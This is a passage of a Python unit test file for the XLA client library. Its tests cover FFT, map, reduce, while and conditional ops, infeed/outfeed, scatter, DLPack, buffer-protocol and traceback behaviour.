c, expected=[np.fft.ifftn(a, axes=(1, 2, 3))], rtol=1e-4)
# RFFT
b = rng.randn(*shape).astype(np.float32)
c = self._NewComputation()
ops.Fft(ops.Constant(c, b), xla_client.FftType.RFFT, shape[-3:])
self._ExecuteAndCompareClose(
c, expected=[np.fft.rfftn(b, axes=(1, 2, 3))], rtol=1e-4)
# IRFFT
c = self._NewComputation()
ops.Fft(ops.Constant(c, a), xla_client.FftType.IRFFT, [3, 4, 8])
self._ExecuteAndCompareClose(
c, expected=[np.fft.irfftn(a, axes=(1, 2, 3))], rtol=1e-4)
def testNextAfter(self):
c = self._NewComputation()
ops.NextAfter(
ops.Constant(c, np.array([1, 2], dtype=np.float32)),
ops.Constant(c, np.array([2, 1], dtype=np.float32)))
out, = self._Execute(c, ())
eps = np.finfo(np.float32).eps
np.testing.assert_equal(
np.array([eps + 1, 2 - eps], dtype=np.float32), out)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testRegularizedIncompleteBeta(self, dtype):
x = np.array([0.53787335, 0.24015466, 0.47494545, 0.13567594, 0.95114538],
dtype=dtype)
a = np.array([0.00753073, 0.34813385, 0.30485708, 1.29298632, 0.51472606],
dtype=dtype)
b = np.array([0.55688389, 0.59794214, 0.42661022, 1.59748339, 0.95047677],
dtype=dtype)
c = self._NewComputation()
ops.RegularizedIncompleteBeta(
ops.Constant(c, a), ops.Constant(c, b), ops.Constant(c, x))
expected = np.array(
[0.98923271, 0.48575411, 0.57952568, 0.12579775, 0.96989155])
self._ExecuteAndCompareClose(c, expected=[expected], rtol=2e-2)
tests.append(SingleOpTest)
class EmbeddedComputationsTest(ComputationTest):
"""Tests for XLA graphs with embedded computations (such as maps)."""
def _CreateConstantComputation(self, in_dtype, out_dtype):
"""Computation (A) -> B that returns a constant 1 for any input."""
c = self._NewComputation("constant_{}_{}_one".format(
in_dtype.__name__, out_dtype.__name__))
ops.Parameter(
c, 0,
xla_client.shape_from_pyval(np.array(
0, dtype=in_dtype)).with_major_to_minor_layout_if_absent())
ops.Constant(c, out_dtype(1))
return c.build()
def _CreateMulBy2Computation(self, dtype):
"""Computation (dtype) -> dtype that multiplies its parameter by 2."""
c = self._NewComputation("mul_f32_by2")
ops.Mul(
ops.Parameter(
c, 0,
xla_client.shape_from_pyval(np.array(
0, dtype=dtype)).with_major_to_minor_layout_if_absent()),
ops.Constant(c, dtype(2.0)))
return c.build()
def _CreateMulF32ByParamComputation(self):
"""Computation (f32) -> f32 that multiplies one parameter by the other."""
c = self._NewComputation("mul_f32_by_param")
ops.Mul(
ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0))),
ops.Parameter(c, 1, xla_client.shape_from_pyval(NumpyArrayF32(0))))
return c.build()
def _CreateBinaryAddComputation(self, dtype):
"""Computation (dtype, dtype) -> dtype that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
shape = shape.with_major_to_minor_layout_if_absent()
ops.Add(ops.Parameter(c, 0, shape), ops.Parameter(c, 1, shape))
return c.build()
def _CreateBinaryGeComputation(self, dtype):
"""Computation (dtype, dtype) -> bool that tests param0 >= param1."""
c = self._NewComputation("param0_lt_param1")
shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
shape = shape.with_major_to_minor_layout_if_absent()
ops.Ge(ops.Parameter(c, 0, shape), ops.Parameter(c, 1, shape))
return c.build()
def _MakeSample3DArray(self, dtype):
return np.array([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]],
dtype=dtype)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testCall(self, dtype):
c = self._NewComputation()
ops.Call(
c,
self._CreateMulBy2Computation(dtype),
operands=(ops.Constant(c, dtype(5.0)),))
self._ExecuteAndCompareClose(c, expected=[10.0])
@parameterized.named_parameters({
"testcase_name": "_{}_{}".format(in_dtype.__name__, out_dtype.__name__),
"in_dtype": in_dtype,
"out_dtype": out_dtype,
} for in_dtype, out_dtype in [[np.float32, np.int32]])
def testMapEachElementToConstant(self, in_dtype, out_dtype):
c = self._NewComputation()
ops.Map(c,
[ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=in_dtype))],
self._CreateConstantComputation(in_dtype, out_dtype), [0])
self._ExecuteAndCompareExact(c, expected=[[1, 1, 1, 1]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testMapMulBy2(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
c = self._NewComputation()
ops.Map(c, [ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype))],
self._CreateMulBy2Computation(dtype), [0])
self._ExecuteAndCompareClose(c, expected=[[2.0, 4.0, 6.0, 8.0]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSimpleMapChain(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
# Chains a map of constant-out with a map of mul-by-2
c = self._NewComputation()
const = ops.Map(
c, [ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype))],
self._CreateConstantComputation(dtype, dtype), [0])
ops.Map(c, [const], self._CreateMulBy2Computation(dtype), [0])
self._ExecuteAndCompareClose(c, expected=[[2.0, 2.0, 2.0, 2.0]])
# TODO(b/154752816): bfloat16 crashes in evaluator.
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes if dtype != bfloat16)
def testDivVectorsWithMap(self, dtype):
def DivComputation():
c = self._NewComputation("div_param0_by_param1")
shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
ops.Div(ops.Parameter(c, 0, shape), ops.Parameter(c, 1, shape))
return c.build()
c = self._NewComputation()
ops.Map(c, (ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype)),
ops.Constant(c, np.array([5.0, 5.0, 4.0, 4.0], dtype=dtype))),
DivComputation(), [0])
self._ExecuteAndCompareClose(
c, expected=[[0.2, 0.4, 0.75, 1.0]], rtol=1e-3)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSelectAndScatter(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
c = self._NewComputation()
operand = ops.Constant(
c, np.array([[1., 2., 6.], [4., 5., 3.]], dtype=dtype))
window_dimensions = (2, 1)
window_strides = (1, 2)
padding = xla_client.window_padding_type_to_pad_values(
xla_client.PaddingType.VALID,
c.get_shape(operand).dimensions(), window_dimensions, window_strides)
ops.SelectAndScatterWithGeneralPadding(
operand,
select=self._CreateBinaryGeComputation(dtype),
window_dimensions=window_dimensions,
window_strides=window_strides,
padding=padding,
source=ops.Constant(c, np.array([[0.1, 0.2]], dtype=dtype)),
init_value=ops.Constant(c, np.array(1, dtype=dtype)),
scatter=self._CreateBinaryAddComputation(dtype))
self._ExecuteAndCompareClose(
c, expected=[[[1., 1., 1.2], [1.1, 1., 1.]]], rtol=5e-3)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testReduce1DtoScalar(self, dtype):
c = self._NewComputation()
ops.Reduce(
c,
operands=[
ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype))
],
init_values=[ops.Constant(c, dtype(0))],
computation=self._CreateBinaryAddComputation(dtype),
dimensions_to_reduce=[0])
self._ExecuteAndCompareClose(c, expected=[10])
# TODO(phawkins): test comparison harness doesn't support bfloat16
@parameterized.named_parameters({
"testcase_name": "_{}_dim{}".format(dtype.__name__, dim),
"dtype": dtype,
"dim": dim,
} for dtype in float_dtypes if dtype != bfloat16 for dim in range(2))
def testReduce2DTo1D(self, dtype, dim):
input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
c = self._NewComputation()
ops.Reduce(
c,
operands=[ops.Constant(c, input_array)],
init_values=[ops.Constant(c, dtype(0))],
computation=self._CreateBinaryAddComputation(dtype),
dimensions_to_reduce=[dim])
self._ExecuteAndCompareClose(c, expected=[np.sum(input_array, axis=dim)])
@parameterized.named_parameters({
"testcase_name": "_{}_dims[{}]".format(dtype.__name__, dims),
"dtype": dtype,
"dims": tuple(dims)
} for dtype in float_dtypes for dims in itertools.permutations(range(3)))
def testReduce3DAllPossibleWaysF32(self, dtype, dims):
input_array = self._MakeSample3DArray(dtype)
c = self._NewComputation()
ops.Reduce(
c,
operands=[ops.Constant(c, input_array)],
init_values=[ops.Constant(c, dtype(0))],
computation=self._CreateBinaryAddComputation(dtype),
dimensions_to_reduce=dims)
self._ExecuteAndCompareClose(c, expected=[np.sum(input_array, axis=dims)])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testReduceWindowValidUnitStrides(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
c = self._NewComputation()
window_dimensions = (2, 1)
window_strides = (1, 1)
padding = xla_client.window_padding_type_to_pad_values(
xla_client.PaddingType.VALID, input_array.shape, window_dimensions,
window_strides)
ops.ReduceWindowWithGeneralPadding(
operand=ops.Constant(c, input_array),
init_value=ops.Constant(c, dtype(0)),
computation=self._CreateBinaryAddComputation(dtype),
window_dimensions=window_dimensions,
window_strides=window_strides,
base_dilations=[],
window_dilations=[],
padding=padding)
self._ExecuteAndCompareClose(c, expected=[[[5., 7., 9.]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testReduceWindowSameUnitStrides(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
c = self._NewComputation()
window_dimensions = (2, 1)
window_strides = (1, 1)
padding = xla_client.window_padding_type_to_pad_values(
xla_client.PaddingType.SAME, input_array.shape, window_dimensions,
window_strides)
ops.ReduceWindowWithGeneralPadding(
operand=ops.Constant(c, input_array),
init_value=ops.Constant(c, dtype(0)),
computation=self._CreateBinaryAddComputation(dtype),
window_dimensions=window_dimensions,
window_strides=window_strides,
base_dilations=[],
window_dilations=[],
padding=padding)
self._ExecuteAndCompareClose(c, expected=[[[5., 7., 9.], [4., 5., 6.]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testReduceWindowValidGeneralStrides(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
c = self._NewComputation()
window_dimensions = (2, 1)
window_strides = (1, 2)
padding = xla_client.window_padding_type_to_pad_values(
xla_client.PaddingType.VALID, input_array.shape, window_dimensions,
window_strides)
ops.ReduceWindowWithGeneralPadding(
operand=ops.Constant(c, input_array),
init_value=ops.Constant(c, dtype(0)),
computation=self._CreateBinaryAddComputation(dtype),
window_dimensions=window_dimensions,
window_strides=window_strides,
base_dilations=[],
window_dilations=[],
padding=padding)
self._ExecuteAndCompareClose(c, expected=[[[5., 9.]]])
def testReduceWindowVariadic(self):
c = self._NewComputation("reducer")
shape = xla_client.shape_from_pyval(np.array(0, dtype=np.int32))
shape = shape.with_major_to_minor_layout_if_absent()
ps = [ops.Parameter(c, i, shape) for i in range(4)]
which = ops.Ge(ps[0], ps[2])
ops.Tuple(
c, [ops.Select(which, ps[0], ps[2]),
ops.Select(which, ps[1], ps[3])])
reducer = c.build()
key_array = np.array([[1, 5, 6], [4, 2, 3]], dtype=np.int32)
val_array = np.array([[7, 8, 9], [10, 11, 12]], dtype=np.int32)
c = self._NewComputation()
window_dimensions = (2, 1)
window_strides = (1, 1)
padding = xla_client.window_padding_type_to_pad_values(
xla_client.PaddingType.VALID, key_array.shape, window_dimensions,
window_strides)
ops.ReduceWindowWithGeneralPadding(
operands=[ops.Constant(c, key_array),
ops.Constant(c, val_array)],
init_values=[
ops.Constant(c, np.int32(0)),
ops.Constant(c, np.int32(0))
],
computation=reducer,
window_dimensions=window_dimensions,
window_strides=window_strides,
base_dilations=[],
window_dilations=[],
padding=padding)
self._ExecuteAndCompareClose(c, expected=[[[4, 5, 6]], [[10, 8, 9]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testWhile(self, dtype):
def LessThan10Cond():
c = self._NewComputation("test_lt_10")
shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
ops.Lt(ops.Parameter(c, 0, shape), ops.Constant(c, dtype(10.)))
return c.build()
cond = LessThan10Cond()
body = self._CreateMulBy2Computation(dtype)
c = self._NewComputation()
init = ops.Constant(c, dtype(1.))
ops.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=[16.])
def testConditionalTrue(self):
c = self._NewComputation()
pred = ops.Constant(c, np.bool_(True))
true_operand = ops.Constant(c, np.float32(3.))
true_computation = self._CreateMulBy2Computation(np.float32)
false_operand = ops.Constant(c, np.float32(2.))
false_computation = self._CreateConstantComputation(
np.float32, np.float32)
ops.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=[6.])
def testConditionalFalse(self):
c = self._NewComputation()
pred = ops.Constant(c, np.bool_(False))
true_operand = ops.Constant(c, np.float32(3.))
true_computation = self._CreateMulBy2Computation(np.float32)
false_operand = ops.Constant(c, np.float32(2.))
false_computation = self._CreateConstantComputation(
np.float32, np.float32)
ops.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=[1.])
@unittest.skipIf(cloud_tpu, "not implemented")
def testInfeedS32Values(self):
to_infeed = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
ops.GetTupleElement(
ops.InfeedWithToken(
ops.CreateToken(c),
xla_client.shape_from_pyval(
to_infeed[0]).with_major_to_minor_layout_if_absent()), 0)
compiled_c = self.backend.compile(c.build())
device = self.backend.local_devices()[0]
for item in to_infeed:
device.transfer_to_infeed(item)
for item in to_infeed:
result, = xla_client.execute_with_python_values(
compiled_c, (), backend=self.backend)
self.assertEqual(result, item)
@unittest.skipIf(cloud_tpu, "not implemented")
def testInfeedTuple(self):
to_infeed = (NumpyArrayS32([1, 2, 3, 4]), NumpyArrayS32([[7], [8]]))
c = self._NewComputation()
ops.GetTupleElement(
ops.InfeedWithToken(
ops.CreateToken(c),
xla_client.shape_from_pyval(
to_infeed).with_major_to_minor_layout_if_absent()), 0)
compiled_c = self.backend.compile(c.build())
device = self.backend.local_devices()[0]
device.transfer_to_infeed(to_infeed)
result = xla_client.execute_with_python_values(
compiled_c, (), backend=self.backend)
self.assertLen(result, 2)
np.testing.assert_equal(result[0], to_infeed[0])
np.testing.assert_equal(result[1], to_infeed[1])
@unittest.skipIf(cloud_tpu, "not implemented")
def testInfeedThenOutfeedS32(self):
to_round_trip = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
x_and_token = ops.InfeedWithToken(
ops.CreateToken(c),
xla_client.shape_from_pyval(
to_round_trip[0]).with_major_to_minor_layout_if_absent())
x = ops.GetTupleElement(x_and_token, 0)
token = ops.GetTupleElement(x_and_token, 1)
outfeed_shape = xla_client.shape_from_pyval(
to_round_trip[0]).with_major_to_minor_layout_if_absent()
ops.OutfeedWithToken(x, token, outfeed_shape)
compiled_c = self.backend.compile(c.build())
device = self.backend.local_devices()[0]
for want in to_round_trip:
execution = threading.Thread(target=lambda: compiled_c.execute([]))
execution.start()
device.transfer_to_infeed(want)
got = device.transfer_from_outfeed(outfeed_shape)
execution.join()
self.assertEqual(want, got)
def testScatter(self):
a = np.arange(9).astype(np.int32).reshape((3, 3))
scatter_indices = np.array([0, 2], dtype=np.int32)
updates = np.array([[10, 20, 30], [70, 80, 90]], dtype=np.int32)
dnums = xla_client.ScatterDimensionNumbers()
dnums.update_window_dims.append(1)
dnums.inserted_window_dims.append(0)
dnums.scatter_dims_to_operand_dims.append(0)
dnums.index_vector_dim = 1
c = self._NewComputation()
ops.Scatter(
ops.Constant(c, a), ops.Constant(c, scatter_indices),
ops.Constant(c, updates), self._CreateBinaryAddComputation(np.int32),
dnums)
expected = np.array([[10, 21, 32], [3, 4, 5], [76, 87, 98]],
dtype=np.int32)
self._ExecuteAndCompareClose(c, expected=[expected])
class DeviceTest(ComputationTest):
def testPlatform(self):
for device in self.backend.local_devices():
self.assertEqual(device.platform, self.backend.platform)
tests.append(DeviceTest)
class ErrorTest(ComputationTest):
def setUp(self):
super(ErrorTest, self).setUp()
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.s32_scalar_2 = NumpyArrayS32(2)
def testCompileWithWrongElementTypeInLayout(self):
c = self._NewComputation()
c.set_op_metadata(xla_client.CurrentSourceInfoMetadata())
ops.Parameter(c, 0, xla_client.shape_from_pyval(self.s32_scalar_2))
c.clear_op_metadata()
options = xla_client.CompileOptions()
options.argument_layouts = [
xla_client.Shape.array_shape(np.dtype(np.float32), [])
]
def TestFun():
return self.backend.compile(c.build(), compile_options=options)
self.assertRaisesRegex(
RuntimeError, r".*Invalid argument shape.*"
r"expected s32\[\], got f32\[\].*", TestFun)
def testInvokeWithWrongElementType(self):
c = self._NewComputation()
c.set_op_metadata(xla_client.CurrentSourceInfoMetadata())
ops.Parameter(c, 0, xla_client.shape_from_pyval(self.s32_scalar_2))
c.clear_op_metadata()
def TestFun():
return xla_client.execute_with_python_values(
self.backend.compile(c.build()), [self.f32_scalar_2], self.backend)
self.assertRaisesRegex(
RuntimeError, r"Invalid argument: Argument does not match.*"
r"want s32\[\], got f32\[\].*", TestFun)
tests.append(EmbeddedComputationsTest)
class ComputationRootTest(ComputationTest):
"""Tests related to setting the root of the computation."""
def testComputationRootDifferentFromLastOp(self):
c = self._NewComputation()
x = ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(2.0)))
result = ops.Add(x, ops.Constant(c, np.float32(3.14)))
ops.Add(result, ops.Constant(c, np.float32(1.618)))
arg = NumpyArrayF32(1.0)
compiled_c = self.backend.compile(c.build(result))
ans, = xla_client.execute_with_python_values(
compiled_c, [arg], backend=self.backend)
np.testing.assert_allclose(ans, 4.14)
tests.append(ComputationRootTest)
class SetShardingTest(ComputationTest):
"""Tests related to set OpSharding."""
def testSetSharding(self):
c = self._NewComputation()
sharding = xla_client.OpSharding()
sharding.type = xla_client.OpSharding.Type.REPLICATED
sharding.tile_assignment_dimensions = [1]
sharding.tile_assignment_devices = [0]
c.set_sharding(sharding)
x = ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(2.0)))
c.clear_sharding()
result = ops.Add(x, ops.Constant(c, np.float32(3.14)))
ops.Add(result, ops.Constant(c, np.float32(1.618)))
arg = NumpyArrayF32(1.0)
compiled_c = self.backend.compile(c.build(result))
ans, = xla_client.execute_with_python_values(
compiled_c, [arg], backend=self.backend)
np.testing.assert_allclose(ans, 4.14)
tests.append(SetShardingTest)
testcase_shapes = [
(),
(1,),
(2, 3),
(2, 0),
(0, 7),
(4, 1, 2),
(2, 1, 3),
(2, 4, 1),
(3, 1),
(1, 3),
]
def FormatShapeAndDtype(shape, dtype):
return "_{}[{}]".format(np.dtype(dtype).name, ",".join(map(str, shape)))
class DLPackTest(parameterized.TestCase):
def setUp(self):
super(DLPackTest, self).setUp()
self.backend = xla_backend()
if self.backend.platform not in ("cpu", "gpu"):
self.skipTest("DLPack requires CPU or GPU")
self.cpu_backend = (
self.backend
if self.backend.platform == "cpu" else xla_client.make_cpu_client())
self.gpu_backend = (
self.backend if self.backend.platform == "gpu" else None)
def tearDown(self):
super().tearDown()
del self.backend
del self.cpu_backend
del self.gpu_backend
# pylint: disable=g-complex-comprehension
# pyformat: disable
@parameterized.named_parameters({
"testcase_name": "{}_own={}_gpu={}".format(
FormatShapeAndDtype(shape, dtype), take_ownership, gpu),
"dtype": dtype,
"shape": shape,
"take_ownership": take_ownership,
"gpu": gpu
} for dtype in dlpack_dtypes for shape in testcase_shapes
for take_ownership in [False, True]
for gpu in [False, True])
# pyformat: enable
def testRoundTrip(self, dtype, shape, take_ownership, gpu):
if gpu and self.gpu_backend is None:
raise unittest.SkipTest("Test not running with GPU support")
backend = self.gpu_backend if gpu else self.cpu_backend
if dtype == np.bool_:
x = np.random.randint(0, 2, size=shape).astype(np.bool_)
else:
x = np.array(np.random.rand(*shape) * 100, dtype=dtype)
buffer = backend.buffer_from_pyval(x)
dlt = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=take_ownership)
del buffer # Free "buffer" to make sure dlt retains ownership.
self.assertEqual(type(dlt).__name__, "PyCapsule")
y = xla_client._xla.dlpack_managed_tensor_to_buffer(
dlt, self.cpu_backend, self.gpu_backend)
np.testing.assert_array_equal(
x.astype(np.uint8) if dtype == np.bool_ else x, y.to_py())
def testTensorsCanBeConsumedOnceOnly(self):
x = np.array(np.random.rand(3, 4, 5, 6), dtype=np.float32)
buffer = self.backend.buffer_from_pyval(x)
dlt = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=True)
def ConsumeDLPackTensor():
_ = xla_client._xla.dlpack_managed_tensor_to_buffer(dlt, self.backend)
ConsumeDLPackTensor()
self.assertRaisesRegex(
RuntimeError, ".*a DLPack tensor may be consumed at most once.*",
ConsumeDLPackTensor)
def testTensorsCanBeOwnedOnceOnly(self):
x = np.array(np.random.rand(3, 4, 5, 6), dtype=np.float32)
buffer = self.backend.buffer_from_pyval(x)
_ = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=True)
self.assertTrue(buffer.is_deleted())
with self.assertRaisesRegex(
RuntimeError,
"Cannot convert deleted/invalid buffer to DLPack tensor.*"):
_ = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=True)
def testNonOwnedDlpackCanBeViewedTwice(self):
x = np.array(np.random.rand(3, 4, 5, 6), dtype=np.float32)
buffer = self.backend.buffer_from_pyval(x)
d1 = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=False)
d2 = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=False)
y = xla_client._xla.dlpack_managed_tensor_to_buffer(d1, self.backend)
z = xla_client._xla.dlpack_managed_tensor_to_buffer(d2, self.backend)
del d1, d2
np.testing.assert_array_equal(x, buffer.to_py())
np.testing.assert_array_equal(x, y.to_py())
np.testing.assert_array_equal(x, z.to_py())
tests.append(DLPackTest)
class BufferProtocolTest(parameterized.TestCase):
def setUp(self):
super(BufferProtocolTest, self).setUp()
self.backend = xla_backend()
if self.backend.platform != "cpu":
self.skipTest("Test requires CPU")
# pylint: disable=g-complex-comprehension
@parameterized.named_parameters({
"testcase_name": FormatShapeAndDtype(shape, dtype),
"dtype": dtype,
"shape": shape
} for dtype in standard_dtypes if dtype != bfloat16
for shape in testcase_shapes)
def testRoundTrip(self, dtype, shape):
x = np.array(np.random.rand(*shape) * 100, dtype=dtype)
x_ptr = x.__array_interface__["data"][0]
buffer = self.backend.buffer_from_pyval(
x, host_buffer_semantics=xla_client.HostBufferSemantics.ZERO_COPY)
y = np.array(buffer, copy=False)
y_ptr = y.__array_interface__["data"][0]
np.testing.assert_array_equal(x, y)
# If the input was sufficiently aligned, the input and output should
# alias.
self.assertTrue((x_ptr & 15) != 0 or x_ptr == y_ptr)
self.assertEqual(y_ptr, buffer.unsafe_buffer_pointer())
during_call = xla_client.HostBufferSemantics.IMMUTABLE_ONLY_DURING_CALL
buffer2 = self.backend.buffer_from_pyval(
x, host_buffer_semantics=during_call)
z = np.array(buffer2, copy=False)
self.assertNotEqual(x.__array_interface__["data"][0],
z.__array_interface__["data"][0])
def testDeleteWithActiveView(self):
x = np.random.randn(20, 10)
buffer = self.backend.buffer_from_pyval(x)
buffer_ptr = buffer.unsafe_buffer_pointer()
y = np.array(buffer, copy=False)
buffer.delete()
# It is still legal to access `y`; the array view must keep it alive.
np.testing.assert_array_equal(x, y)
self.assertEqual(y.__array_interface__["data"][0], buffer_ptr)
tests.append(BufferProtocolTest)
class TracebackTest(absltest.TestCase):
def setUp(self):
super(TracebackTest, self).setUp()
self.backend = xla_backend()
def testNoTracebacksIfDisabled(self):
with xla_client.tracebacks(enabled=False):
self.assertEqual(None, xla_client.Traceback.get_traceback())
buffer = self.backend.buffer_from_pyval(np.array(7, np.int32))
self.assertEqual(None, buffer.traceback)
b = xla_client.XlaBuilder("computation")
ops.Add(ops.Constant(b, np.int32(1)), ops.Constant(b, np.int32(2)))
e = self.backend.compile(b.build())
self.assertEqual(None, e.traceback)
def assertIsTracebackContaining(self, tb, function):
self.assertIsInstance(tb, xla_client.Traceback)
self.assertIn(function, str(tb))
self.assertTrue(any(f.function_name == function for f in tb.frames))
def testTracebacks(self):
with xla_client.tracebacks(enabled=True):
tb = xla_client.Traceback.get_traceback()
self.assertIsTracebackContaining(tb, "testTracebacks")
# Tracebacks are not implemented on the TPU driver extension's variant
# of buffers and executables.
if not isinstance(self.backend, xla_client.Client):
return
buffer = self.backend.buffer_from_pyval(np.array(7, np.int32))
self.assertIsTracebackContaining(buffer.traceback, "testTracebacks")
b = xla_client.XlaBuilder("computation")
ops.Add(ops.Constant(b, np.int32(1)), ops.Constant(b, np.int32(2)))
e = self.backend.compile(b.build())
self.assertIsTracebackContaining(e.traceback, "testTracebacks")
def testNestedFunction(self):
def AFunction():
def AnotherFunction():
return xla_client.Traceback.get_traceback()
return AnotherFunction()
with xla_client.tracebacks(enabled=True):
tb = AFunction()
self.assertIsInstance(tb, xla_client.Traceback)
frames = tb.frames
i = next(
i for (i, f) in enumerate(frames) if f.function_name == "AFunction")
self.assertEqual(frames[i - 1].function_name, "AnotherFunction")
self.assertEqual(frames[i + 1].function_name, "testNestedFunction")
tests.append(TracebackTest)
class ClientTest(ComputationTest):
def setUp(self):
super(ClientTest, self).setUp()
self.backend = xla_backend()
def testPlatformVersion(self):
version = self.backend.platform_version
logging.info("platform_version:\n%s", version)
if self.backend.platform == "cpu":
self.assertEqual(version, "<unknown>")
elif self.backend.platform == "gpu":
# Following is false if not built with --config=cuda
if test_util.is_gpu_available(cuda_only=True):
self.assertTrue(
re.match(r"^cuda \d{4,}$", version),
msg=f"Expected CUDA version string; got {repr(version)}")
else:
self.assertEqual(version, "<unknown>")
elif self.backend.platform == "tpu" and not cloud_tpu:
self.assertIn("tpu", version.lower())
self.assertIn("cl/", version)
@unittest.skipIf(cloud_tpu or tfrt_tpu, "not implemented")
def testExecutableSerialization(self):
if self.backend.platform != "tpu":
self.skipTest("Test requires tpu platform")
c = self._NewComputation()
ops.Add(
ops.Constant(c, NumpyArrayS32([1, 2])),
ops.Constant(c, NumpyArrayS32([3, 4])))
options = xla_client.CompileOptions()
executable = self.backend.compile(c.build(), options)
self.assertLen(executable.hlo_modules(), 1)
serialized = self.backend.serialize_executable(executable)
deserialized = self.backend.deserialize_executable(
serialized,
executable.hlo_modules()[0], options)
expected, = xla_client.execute_with_python_values(executable, (),
self.backend)
actual, = xla_client.execute_with_python_values(deserialized, (),
self.backend)
self.assertTrue(np.all(actual == expected))
tests.append(ClientTest)
# TODO(b/182461453): Add TFRT and cloud TPU implementation of
# ReadDynamicShapes
class DynamicReshapeTest(ComputationTest):
"""Tests related to DynamicReshape."""
def _CompareToPyAndBufferProtocol(self, builder, args, expected_results,
test_fn):
compiled = self.backend.compile(builder.build())
output_buffers = compiled.execute([
self.backend.buffer_from_pyval(
arg, device=compiled.local_devices()[0]) for arg in args
])
self.assertLen(output_buffers, len(expected_results))
for buf, expected in zip(output_buffers, expected_results):
to_py_result = buf.to_py()
self.assertEqual(expected.shape, to_py_result.shape)
test_fn(expected, to_py_result)
if self.backend.platform == "cpu" and buf.dtype != bfloat16:
mview = memoryview(buf)
self.assertEqual(expected.shape, mview.shape)
test_fn(expected, np.asarray(mview))
else:
# Buffer protocol expected to fail on non-cpu platforms and bfloat16
# Note that np.asarray(buf) doesn't throw an exception. To test if the
# error was thrown properly we must use memoryview(buf).
with self.assertRaises(BufferError):
memoryview(buf)
# 1D reshape of full size, half size, and size of 0.
@unittest.skipIf(cloud_tpu or tfrt_tpu or external_tpu, "not implemented")
@parameterized.parameters((5), (3), (0))
def testReshape1D(self, reshape_size):
full_size = 5
c = self._NewComputation()
arg = np.array(reshape_size, dtype=np.int32)
expected = np.array(range(reshape_size), dtype=np.int32)
p = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg))
ops.DynamicReshape(
ops.Constant(c, NumpyArrayS32(range(full_size))), [p], [full_size],
[True])
self._CompareToPyAndBufferProtocol(c, [arg], [expected],
np.testing.assert_equal)
# 2D reshape with an slice on the minor dimension. We test different types
# where the strides may differ between the host and devices. The reshaped
# physical memory layout is not consecutive, and we test if the program can
# return the correct logical view of the data.
@unittest.skipIf(cloud_tpu or tfrt_tpu or external_tpu, "not implemented")
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes + float_dtypes)
def testReshape2D(self, dtype):
